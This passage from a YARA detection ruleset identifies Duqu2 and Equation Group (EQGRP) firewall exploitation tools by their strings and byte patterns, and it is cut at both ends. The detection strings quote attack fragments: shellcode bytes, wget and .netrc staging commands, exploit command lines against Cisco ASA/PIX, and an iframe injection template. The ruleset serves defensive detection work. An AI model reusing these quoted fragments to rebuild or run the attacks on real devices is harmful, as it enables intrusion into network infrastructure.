$s5 = "Samsung Electronics Co., Ltd." 
fullword wide condition: uint16(0) == 0x5a4d and filesize < 82KB and all of them } rule APT_Kaspersky_Duqu2_msi3_32 { meta: description = "Kaspersky APT Report - Duqu2 Sample - file d8a849654ab97debaf28ae5b749c3b1ff1812ea49978713853333db48c3972c3" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b" strings: $s0 = "ProcessUserAccounts" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide /* PEStudio Blacklist: strings */ $s2 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide /* PEStudio Blacklist: strings */ $s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide $s4 = "msi3_32.dll" fullword wide $s5 = "RunDLL" fullword ascii $s6 = "MSI Custom Action v3" fullword wide $s7 = "msi3_32" fullword wide $s8 = "Operating System" fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 9203 times */ condition: uint16(0) == 0x5a4d and filesize < 72KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-08-15 Identifier: EQGRP */ /* Rule Set ----------------------------------------------------------------- */ rule EQGRP_noclient_3_0_5 { meta: description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii $x2 = "Command too long! What the HELL are you trying to do to me?!?! Try one smaller than %d bozo." 
fullword ascii $x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii $x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii $x5 = "ourtn -d -D %s -W 127.0.0.1:%d -i %s -p %d %s %s" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them ) } rule EQGRP_installdate { meta: description = "Detects tool from EQGRP toolset - file installdate.pl" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii $x2 = "print \"Gimme hex: \";" fullword ascii $x3 = "if ($line =~ /Reg_Dword: (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii $s1 = "if ($_ =~ /InstallDate/) {" fullword ascii $s2 = "if (not($cmdInput)) {" fullword ascii $s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii condition: filesize < 2KB and ( 1 of ($x*) or 3 of them ) } rule EQGRP_teflondoor { meta: description = "Detects tool from EQGRP toolset - file teflondoor.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "%s: abort. Code is %d. Message is '%s'" fullword ascii $x2 = "%s: %li b (%li%%)" fullword ascii $s1 = "no winsock" fullword ascii $s2 = "%s: %s file '%s'" fullword ascii $s3 = "peer: connect" fullword ascii $s4 = "read: write" fullword ascii $s5 = "%s: done!" 
fullword ascii $s6 = "%s: %li b" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 30KB and 1 of ($x*) and 3 of them } rule EQGRP_durablenapkin_solaris_2_0_1 { meta: description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii $s2 = "send_request: putmsg \"%s\": %s" fullword ascii $s3 = "port undefined" fullword ascii $s4 = "recv_ack: %s getmsg: %s" fullword ascii $s5 = ">> %d -- %d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 2 of them ) } rule EQGRP_teflonhandle { meta: description = "Detects tool from EQGRP toolset - file teflonhandle.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii $s2 = "File %s already exists. Overwrite? (y/n) " fullword ascii $s3 = "Random Key : 0x" fullword ascii $s4 = "done (%i bytes written)." fullword ascii $s5 = "%s --> %s..." 
fullword ascii condition: uint16(0) == 0x5a4d and filesize < 20KB and 2 of them } rule EQGRP_false { meta: description = "Detects tool from EQGRP toolset - file false.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20 2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00 00 25 64 20 2D 20 25 64 } condition: uint16(0) == 0x5a4d and filesize < 50KB and $s1 } rule EQGRP_bc_genpkt { meta: description = "Detects tool from EQGRP toolset - file bc-genpkt" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "load auxiliary object=%s requested by file=%s" fullword ascii $x2 = "size of new packet, should be %d <= size <= %d bytes" fullword ascii $x3 = "verbosity - show lengths, packet dumps, etc" fullword ascii $s1 = "%s: error while loading shared libraries: %s%s%s%s%s" fullword ascii $s2 = "cannot dynamically load executable" fullword ascii $s3 = "binding file %s to %s: %s symbol `%s' [%s]" fullword ascii $s4 = "randomize the initiator cookie" fullword ascii condition: uint16(0) == 0x457f and filesize < 1000KB and ( 1 of ($s*) and 3 of them ) } rule EQGRP_dn_1_0_2_1 { meta: description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii $s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii $s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii $s4 = "Not everything is set yet" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 2 of them ) } rule EQGRP_morel { meta: description = "Detects 
tool from EQGRP toolset - file morel.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f" strings: $s1 = "%d - %d, %d" fullword ascii $s2 = "%d - %lu.%lu %d.%lu" fullword ascii $s3 = "%d - %d %d" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 60KB and all of them ) } rule EQGRP_bc_parser { meta: description = "Detects tool from EQGRP toolset - file bc-parser" author = "Florian Roth" reference = "Research" date = "2016-08-15" hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee" strings: $s1 = "*** Target may be susceptible to FALSEMOREL ***" fullword ascii $s2 = "*** Target is susceptible to FALSEMOREL ***" fullword ascii condition: uint16(0) == 0x457f and 1 of them } rule EQGRP_1212 { meta: description = "Detects tool from EQGRP toolset - file 1212.pl" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii $s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii $s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii $s4 = "$dstport=hextoPort($dstport);" fullword ascii $s5 = "sub hextoPort" fullword ascii $s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii condition: filesize < 6KB and 4 of them } rule EQGRP_1212_dehex { meta: description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii $s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii $s3 = "push(@octets,$byte_table{$tempi});" fullword ascii $s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii $s5 = "print hextoIP($ARGV[0]);" fullword 
ascii condition: ( uint16(0) == 0x2123 and filesize < 6KB and ( 5 of ($s*) ) ) or ( all of them ) } /* Yara Rule Set Author: Florian Roth Date: 2016-08-16 Identifier: EQGRP */ /* Rule Set ----------------------------------------------------------------- */ rule install_get_persistent_filenames { meta: description = "EQGRP Toolset Firewall - file install_get_persistent_filenames" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291" strings: $s1 = "Generates the persistence file name and prints it out." fullword ascii condition: ( uint16(0) == 0x457f and all of them ) } rule EQGRP_create_dns_injection { meta: description = "EQGRP Toolset Firewall - file create_dns_injection.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32" strings: $s1 = "Name: A hostname: 'host.network.com', a decimal numeric offset within" fullword ascii $s2 = "-a www.badguy.net,CNAME,1800,host.badguy.net \\\\" fullword ascii condition: 1 of them } rule EQGRP_screamingplow { meta: description = "EQGRP Toolset Firewall - file screamingplow.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a" strings: $s1 = "What is the name of your PBD:" fullword ascii $s2 = "You are now ready for a ScreamPlow" fullword ascii condition: 1 of them } rule EQGRP_MixText { meta: description = "EQGRP Toolset Firewall - file MixText.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795" strings: $s1 = "BinStore enabled implants." 
fullword ascii condition: 1 of them } rule EQGRP_tunnel_state_reader { meta: description = "EQGRP Toolset Firewall - file tunnel_state_reader" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c" strings: $s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii $s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii condition: 1 of them } rule EQGRP_payload { meta: description = "EQGRP Toolset Firewall - file payload.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07" strings: $s1 = "can't find target version module!" fullword ascii $s2 = "class Payload:" fullword ascii condition: all of them } rule EQGRP_eligiblecandidate { meta: description = "EQGRP Toolset Firewall - file eligiblecandidate.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86" strings: $o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii $o2 = "Could not reliably detect cookie. Using 'session_id'..." 
fullword ascii $c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii $c2 = "self.build_exploit_payload(cmd)" fullword ascii condition: 1 of them } rule EQGRP_BUSURPER_2211_724 { meta: description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744" strings: $s1 = ".got_loader" fullword ascii $s2 = "_start_text" fullword ascii $s3 = "IMPLANT" fullword ascii $s4 = "KEEPGOING" fullword ascii $s5 = "upgrade_implant" fullword ascii condition: all of them } rule EQGRP_networkProfiler_orderScans { meta: description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898" strings: $x1 = "Unable to save off predefinedScans directory" fullword ascii $x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii condition: 1 of them } rule EQGRP_epicbanana_2_1_0_1 { meta: description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61" strings: $s1 = "failed to create version-specific payload" fullword ascii $s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii condition: 1 of them } rule EQGRP_sniffer_xml2pcap { meta: description = "EQGRP Toolset Firewall - file sniffer_xml2pcap" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42" strings: $x1 = "-s/--srcip <sourceIP> Use given source IP (if sniffer doesn't collect source IP)" fullword ascii $x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." 
fullword ascii condition: 1 of them } rule EQGRP_BananaAid { meta: description = "EQGRP Toolset Firewall - file BananaAid" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f" strings: $x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii $x2 = "scp BGLEE-" ascii $x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii $x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii condition: 1 of them } rule EQGRP_bo { meta: description = "EQGRP Toolset Firewall - file bo" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d" strings: $s1 = "ERROR: failed to open %s: %d" fullword ascii $s2 = "__libc_start_main@@GLIBC_2.0" fullword ascii $s3 = "serial number: %s" fullword ascii $s4 = "strerror@@GLIBC_2.0" fullword ascii $s5 = "ERROR: mmap failed: %d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 20KB and all of them ) } rule EQGRP_SecondDate_2211 { meta: description = "EQGRP Toolset Firewall - file SecondDate-2211.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607" strings: $s1 = "SD_processControlPacket" fullword ascii $s2 = "Encryption_rc4SetKey" fullword ascii $s3 = ".got_loader" fullword ascii $s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and all of them ) } rule EQGRP_config_jp1_UA { meta: description = "EQGRP Toolset Firewall - file config_jp1_UA.pl" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56" strings: $x1 = "This program will configure a JETPLOW Userarea file." fullword ascii $x2 = "Error running config_implant." 
fullword ascii $x3 = "NOTE: IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii $x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii condition: 1 of them } rule EQGRP_userscript { meta: description = "EQGRP Toolset Firewall - file userscript.FW" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7" strings: $x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii condition: 1 of them } rule EQGRP_BBALL_M50FW08_2201 { meta: description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7" strings: $s1 = ".got_loader" fullword ascii $s2 = "LOADED" fullword ascii $s3 = "pageTable.c" fullword ascii $s4 = "_start_text" fullword ascii $s5 = "handler_readBIOS" fullword ascii $s6 = "KEEPGOING" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 5 of ($s*) ) } rule EQGRP_BUSURPER_3001_724 { meta: description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b" strings: $s1 = "IMPLANT" fullword ascii $s2 = "KEEPGOING" fullword ascii $s3 = "upgrade_implant" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them ) } rule EQGRP_workit { meta: description = "EQGRP Toolset Firewall - file workit.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac" strings: $s1 = "macdef init > /tmp/.netrc;" fullword ascii $s2 = "/usr/bin/wget http://" fullword ascii $s3 = "HOME=/tmp ftp" fullword ascii $s4 = " >> /tmp/.netrc;" fullword ascii $s5 = 
"/usr/rapidstream/bin/tftp" fullword ascii $s6 = "created shell_command:" fullword ascii $s7 = "rm -f /tmp/.netrc;" fullword ascii $s8 = "echo quit >> /tmp/.netrc;" fullword ascii $s9 = "echo binary >> /tmp/.netrc;" fullword ascii $s10 = "chmod 600 /tmp/.netrc;" fullword ascii $s11 = "created cli_command:" fullword ascii condition: 6 of them } rule EQGRP_tinyhttp_setup { meta: description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0" strings: $x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii $x2 = "What is the name of your implant:" fullword ascii /* it's called conscience */ $x3 = "killall thttpd" fullword ascii $x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 2KB and 1 of ($x*) ) or ( all of them ) } rule EQGRP_shellcode { meta: description = "EQGRP Toolset Firewall - file shellcode.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f" strings: $s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii $s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii $s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii $c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 } /* $c2 = { 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 } too many fps */ $c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 } condition: 1 of them } rule EQGRP_EPBA { meta: description = "EQGRP Toolset Firewall - file EPBA.script" author = "Florian Roth" reference = 
"Research" date = "2016-08-16" hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7" strings: $x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii $x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii $x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii $x4 = "--target_vers=TARGET_VERS target Pix version (pix712, asa804) (REQUIRED)" fullword ascii $x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii $x6 = "this operation is complete, BananaGlee will" fullword ascii $x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii condition: ( uint16(0) == 0x2023 and filesize < 7KB and 1 of ($x*) ) or ( 3 of them ) } rule EQGRP_BPIE { meta: description = "EQGRP Toolset Firewall - file BPIE-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688" strings: $s1 = "profProcessPacket" fullword ascii $s2 = ".got_loader" fullword ascii $s3 = "getTimeSlotCmdHandler" fullword ascii $s4 = "getIpIpCmdHandler" fullword ascii $s5 = "LOADED" fullword ascii $s6 = "profStartScan" fullword ascii $s7 = "tmpData.1" fullword ascii $s8 = "resetCmdHandler" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 70KB and 6 of ($s*) ) } rule EQGRP_jetplow_SH { meta: description = "EQGRP Toolset Firewall - file jetplow.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c" strings: $s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii $s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii $s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii $s4 = "***** Welcome to JetPlow *****" 
fullword ascii condition: 1 of them } rule EQGRP_BBANJO { meta: description = "EQGRP Toolset Firewall - file BBANJO-3011.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3" strings: $s1 = "get_lsl_interfaces" fullword ascii $s2 = "encryptFC4Payload" fullword ascii $s3 = ".got_loader" fullword ascii $s4 = "beacon_getconfig" fullword ascii $s5 = "LOADED" fullword ascii $s6 = "FormBeaconPacket" fullword ascii $s7 = "beacon_reconfigure" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and all of them ) } rule EQGRP_BPATROL_2201 { meta: description = "EQGRP Toolset Firewall - file BPATROL-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395" strings: $s1 = "dumpConfig" fullword ascii $s2 = "getstatusHandler" fullword ascii $s3 = ".got_loader" fullword ascii $s4 = "xtractdata" fullword ascii $s5 = "KEEPGOING" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and all of them ) } rule EQGRP_extrabacon { meta: description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735" strings: $x1 = "To disable password checking on target:" fullword ascii $x2 = "[-] target is running" fullword ascii $x3 = "[-] problem importing version-specific shellcode from" fullword ascii $x4 = "[+] importing version-specific shellcode" fullword ascii $s5 = "[-] unsupported target version, abort" fullword ascii condition: 1 of them } rule EQGRP_sploit_py { meta: description = "EQGRP Toolset Firewall - file sploit.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6" strings: $x1 = "the --spoof option requires 3 or 4 fields as follows 
redir_ip" ascii $x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii $x3 = "[-] no response from health check - target may have crashed" fullword ascii condition: 1 of them } rule EQGRP_uninstallPBD { meta: description = "EQGRP Toolset Firewall - file uninstallPBD.bat" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0" strings: $s1 = "memset 00e9a05c 4 38845b88" fullword ascii $s2 = "_hidecmd" fullword ascii $s3 = "memset 013abd04 1 0d" fullword ascii condition: all of them } rule EQGRP_BICECREAM { meta: description = "EQGRP Toolset Firewall - file BICECREAM-2140" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210" strings: $s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii $s2 = "command data size is invalid for an exec cmd" fullword ascii $s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii $s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii $s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii $s6 = "[%d] Execute code." fullword ascii $s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii $s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii $s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them ) } rule EQGRP_create_http_injection { meta: description = "EQGRP Toolset Firewall - file create_http_injection.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d" strings: $x1 = "required by SECONDDATE" fullword ascii $s1 = "help='Output file name (optional). 
By default the resulting data is written to stdout.')" fullword ascii $s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii $s3 = "version='%prog 1.0'," fullword ascii $s4 = "usage='%prog [ ... options ... ] url'," fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them ) } rule EQGRP_BFLEA_2201 { meta: description = "EQGRP Toolset Firewall - file BFLEA-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e" strings: $s1 = ".got_loader" fullword ascii $s2 = "LOADED" fullword ascii $s3 = "readFlashHandler" fullword ascii $s4 = "KEEPGOING" fullword ascii $s5 = "flashRtnsPix6x.c" fullword ascii $s6 = "fix_ip_cksum_incr" fullword ascii $s7 = "writeFlashHandler" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them ) } rule EQGRP_BpfCreator_RHEL4 { meta: description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92" strings: $s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii $s2 = "error reading dump file: %s" fullword ascii $s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii $s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii $s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and all of them ) } rule EQGRP_StoreFc { meta: description = "EQGRP Toolset Firewall - file StoreFc.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108" strings: $x1 = "Usage: StoreFc.py --configFile=<path to xml file> 
--implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii $x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii $x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii condition: 1 of them } rule EQGRP_hexdump { meta: description = "EQGRP Toolset Firewall - file hexdump.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a" strings: $s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii $s2 = "print >>out, \"%s%04x \" % (lead,i)," fullword ascii $s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii $s4 = "print >>out, sane(x[i:i+16])" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 1KB and 2 of ($s*) ) or ( all of them ) } rule EQGRP_BBALL { meta: description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6" strings: $s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii $s2 = ".got_loader" fullword ascii $s3 = "handler_readBIOS" fullword ascii $s4 = "cmosReadByte" fullword ascii $s5 = "KEEPGOING" fullword ascii $s6 = "checksumAreaConfirmed.0" fullword ascii $s7 = "writeSpeedPlow.c" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 4 of ($s*) ) or ( all of them ) } /* Super Rules ------------------------------------------------------------- */ rule EQGRP_BARPUNCH_BPICKER { meta: description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" strings: $x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s 
